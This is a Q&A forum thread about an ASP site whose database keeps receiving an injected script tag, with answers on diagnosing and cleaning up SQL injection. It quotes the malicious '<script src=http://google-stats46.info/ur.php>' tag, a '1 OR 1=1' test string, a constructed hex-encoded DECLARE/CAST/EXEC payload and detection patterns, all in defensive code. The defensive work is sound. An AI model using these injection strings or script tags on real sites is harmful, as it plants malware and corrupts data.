views:

170

answers:

5

My website has been attacked by some malicious script: </title><script src=http://google-stats46.info/ur.php>. This script is appended to column(s) of some tables automatically. I have removed this script, but after a few hours it re-appeared in some tables. This time it is </title><script src=http://google-stats45.info/ur.php>. This has been happening for a week. I don't know how it is possible. Please give me a solution.

+2  A: 

Change your database connection's username and password. Maybe it is some simple user and pass and a script has found them.

rahim asgari
+2  A: 

Check your website (or any other internet-connected endpoint that consumes this DB) for SQL injection attacks.

Dies
A: 

Do this; if the script is there again, then update the question. Maybe it is just an easy user/password problem that could be solved that way... if not, maybe give the URL to your website; maybe someone here could look for a security hole :)

jose152
+1  A: 

Look in your IIS logs for the term CAST( to try to find the SQL injection attempts.

Someone else with the same problem.

Martin Smith
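A way to do the IIS-log search Martin Smith suggests, as an added example that is not part of any answer here: a Python script that parses W3C-format IIS log lines, URL-decodes the querystring, flags the CAST( / DECLARE @ / EXEC( tokens that never belong in an id parameter, and decodes 0x hex literals so the obfuscated statement reads plainly. The log lines, IP addresses, paths and the placeholder payload text are all constructed for the example; the field names are the standard W3C ones IIS writes.

```python
import re
from urllib.parse import quote, unquote_plus

# --- Constructed sample (not from the original post) -------------------------
# The payload text is a placeholder standing in for whatever the attacker's
# hex-encoded statement really was; the wrapping pattern it imitates
# (DECLARE ... SET @S=CAST(0x... AS VARCHAR) ... EXEC(@S)) is what the
# "search your logs for CAST(" advice is aimed at.
_PAYLOAD_SQL = "UPDATE t_users SET lname=lname+'INJECTED_PLACEHOLDER'"
_OBFUSCATED_QUERY = (
    "id=42;DECLARE @S VARCHAR(4000);SET @S=CAST(0x"
    + _PAYLOAD_SQL.encode("ascii").hex().upper()
    + " AS VARCHAR(4000));EXEC(@S);--"
)
SAMPLE_LOG = "\n".join([
    "#Software: Microsoft Internet Information Services 6.0",
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2010-01-01 10:00:01 203.0.113.5 GET /news.asp id=42 200",
    "2010-01-01 10:00:04 203.0.113.7 GET /search.asp q=broadcast 200",
    "2010-01-01 10:00:07 198.51.100.9 GET /news.asp "
    + quote(_OBFUSCATED_QUERY, safe="=;()@,-") + " 200",
    "2010-01-01 10:00:09 203.0.113.5 GET /login.asp user=joe 200",
])

# Tokens that should never appear in a querystring meant to carry a record id.
SUSPICIOUS = re.compile(r"\b(CAST\s*\(|DECLARE\s+@|EXEC\s*\()", re.IGNORECASE)
HEX_LITERAL = re.compile(r"0x([0-9A-Fa-f]+)")


def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for raw in text.splitlines():
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]
            continue
        if not raw or raw.startswith("#"):
            continue
        parts = raw.split(" ")
        if fields is None or len(parts) != len(fields):
            continue  # directive or malformed line
        yield dict(zip(fields, parts))


def decode_hex_literals(sql):
    """Replace 0x... literals with the ASCII they encode so the hidden statement is readable."""
    def repl(m):
        try:
            return bytes.fromhex(m.group(1)).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            return m.group(0)  # not a text payload (or odd length); leave it alone
    return HEX_LITERAL.sub(repl, sql)


def find_injection_attempts(text):
    """Return the requests whose decoded querystring carries SQL keywords."""
    hits = []
    for rec in parse_w3c(text):
        query = unquote_plus(rec.get("cs-uri-query", "-"))
        if SUSPICIOUS.search(query):
            hits.append({
                "time": rec["date"] + " " + rec["time"],
                "ip": rec["c-ip"],
                "uri": rec["cs-uri-stem"],
                "decoded_query": decode_hex_literals(query),
            })
    return hits


if __name__ == "__main__":
    for hit in find_injection_attempts(SAMPLE_LOG):
        print(hit["time"], hit["ip"], hit["uri"])
        print("   ", hit["decoded_query"])
```

Run it against a real log by replacing SAMPLE_LOG with the file contents; the source IPs and timestamps it reports tell you when the first attempt landed (useful for picking a backup to restore) and which ASP page and parameter were abused.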
A: 

If you are seeing JavaScript in your tables then it is a classic SQL injection attack. You need to update your ASP pages to validate your inputs from your querystrings before appending them to a SQL command.

As for the current state of the DB, you can either restore from backup or write custom scripts to clean out the inserted JavaScript from your tables.

I dug around some old code and found a function (below) I wrote for an old site that was massively hit with an injection attack a few years ago. I just used this function to validate all values from the querystring that were not being validated.

Obviously there are much more secure, permanent, and "correct" ways to fix this, but this was quick and easy, and it stopped all attacks.

EXAMPLE

Current SQL:
"SELECT lname,fname from t_users where userid = " & request("userid")

Change to:
"SELECT lname,fname from t_users where userid = " & V(request("userid"),"int")

Function V(x, t)
    ' ====================================================================
    ' Function will validate the data type of the passed string and
    ' redirect to the error page if it fails; otherwise it returns x.
    ' EXAMPLES:
    ' Date -            V([STRING], "Date")
    ' Integer           V([STRING], "Int")
    ' Email             V([STRING], "Email")
    ' String Length     V([STRING], 25)
    ' ====================================================================
    Dim bFail, sString, nIndex, nDotIndex
    bFail = 0
    Select Case UCase(t)
        Case "DATE" ' Date
            If Not IsDate(x) Then bFail = 1
        Case "INT" ' Integer
            ' Note: IsNumeric also accepts "1.5", "1e3" and "&HFF";
            ' tighten this check if the column really is an integer.
            If Not IsNumeric(x) Then bFail = 1
        Case "EMAIL" ' Email Address
            sString = Trim(x)
            nIndex = InStr(1, sString, "@")
            nDotIndex = InStrRev(sString, ".")
            If nIndex < 2 Then bFail = 1
            If nDotIndex < nIndex + 1 Then bFail = 1
            If InStr(nIndex + 1, sString, "@") > nIndex Then bFail = 1
            If nDotIndex > Len(sString) - 2 Then bFail = 1
            If Len(x) > 100 Then bFail = 1
        Case Else
            If IsNumeric(t) Then ' Pass an integer to test for length
                ' CLng so a length passed as the string "25" compares numerically
                If Len(x) > CLng(t) Then bFail = 1
            End If
    End Select
    If bFail Then
        Response.Redirect("/error.asp") ' Sent to error page
    Else
        V = x ' PASS
    End If
End Function
Joe King
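The two halves of Joe King's answer (stop splicing raw querystring values into SQL, then clean the JavaScript out of the tables) as an added Python example that is not code from any of the answers. It uses an in-memory SQLite database as a stand-in for the SQL Server behind the ASP pages, so the table, rows and the injected tag are constructed; validate_int() is a strict counterpart of V(x, "int"), and lookup_param() shows the bound-parameter fix that removes the need to validate the value before it reaches the query at all.

```python
import re
import sqlite3

# Shape of the junk the question describes: a stray </title> followed by a
# <script src=...></script>, appended to the end of a text cell.
INJECTED = re.compile(r"(</title>)?<script\b[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)
# Constructed stand-in for the injected tag; .invalid is a reserved, non-resolving TLD.
SAMPLE_TAG = "</title><script src=http://attacker.invalid/ur.php></script>"


def setup_db():
    """Constructed sample table mirroring t_users from the answer."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE t_users (userid INTEGER PRIMARY KEY, lname TEXT, fname TEXT);
        INSERT INTO t_users VALUES (1, 'King', 'Joe');
        INSERT INTO t_users VALUES (2, 'Smith', 'Martin');
        INSERT INTO t_users VALUES (3, 'Asgari', 'Rahim');
    """)
    return conn


def lookup_concat(conn, userid):
    """VULNERABLE: the equivalent of "... where userid = " & request("userid")."""
    return conn.execute("SELECT lname, fname FROM t_users WHERE userid = " + userid).fetchall()


def validate_int(x):
    """Strict counterpart of V(x, "int"): a whole number only, so "1 OR 1=1",
    "1e3", "1.5" and "&HFF" are rejected instead of passed through."""
    if not re.fullmatch(r"-?\d{1,10}", x.strip()):
        raise ValueError("not an integer: %r" % (x,))
    return int(x)


def lookup_param(conn, userid):
    """SAFE: a bound parameter travels as data and is never part of the SQL text."""
    return conn.execute(
        "SELECT lname, fname FROM t_users WHERE userid = ?", (userid,)
    ).fetchall()


def text_columns(conn):
    """Yield (table, column) for every TEXT column, read from the schema itself."""
    names = [r[0] for r in conn.execute("SELECT name FROM sqlite_master WHERE type = 'table'")]
    for table in names:
        # PRAGMA table_info rows: cid, name, type, notnull, dflt_value, pk
        for _cid, name, ctype, _notnull, _dflt, _pk in conn.execute('PRAGMA table_info("%s")' % table):
            if ctype.upper() == "TEXT":
                yield table, name


def clean_injected_script(conn):
    """Strip the injected tag from every text cell; returns how many cells changed.
    Doing the rewrite with a regex in code rather than SQL REPLACE() catches every
    domain variant (google-stats45 vs google-stats46 in the question) with one pattern.
    Table and column names come from the schema, not from users, hence the plain quoting."""
    changed = 0
    for table, col in text_columns(conn):
        rows = conn.execute('SELECT rowid, "%s" FROM "%s"' % (col, table)).fetchall()
        for rowid, value in rows:
            if value is None:
                continue
            cleaned = INJECTED.sub("", value)
            if cleaned != value:
                conn.execute('UPDATE "%s" SET "%s" = ? WHERE rowid = ?' % (table, col),
                             (cleaned, rowid))
                changed += 1
    conn.commit()
    return changed


def simulate_compromise(conn):
    """Test fixture only: append the sample tag to lname, the state the question describes."""
    conn.execute("UPDATE t_users SET lname = lname || ?", (SAMPLE_TAG,))
    conn.commit()


if __name__ == "__main__":
    db = setup_db()
    print(lookup_concat(db, "1 OR 1=1"))        # every row comes back
    print(lookup_param(db, "1 OR 1=1"))         # no row: the string is just data
    print(lookup_param(db, validate_int("2")))  # the one intended row
    simulate_compromise(db)
    print(clean_injected_script(db), "cells cleaned")
```

Take a backup before running a cleaner like this against production, and fix the injection point first: as the question shows, cleaning without closing the hole just means the script comes back a few hours later.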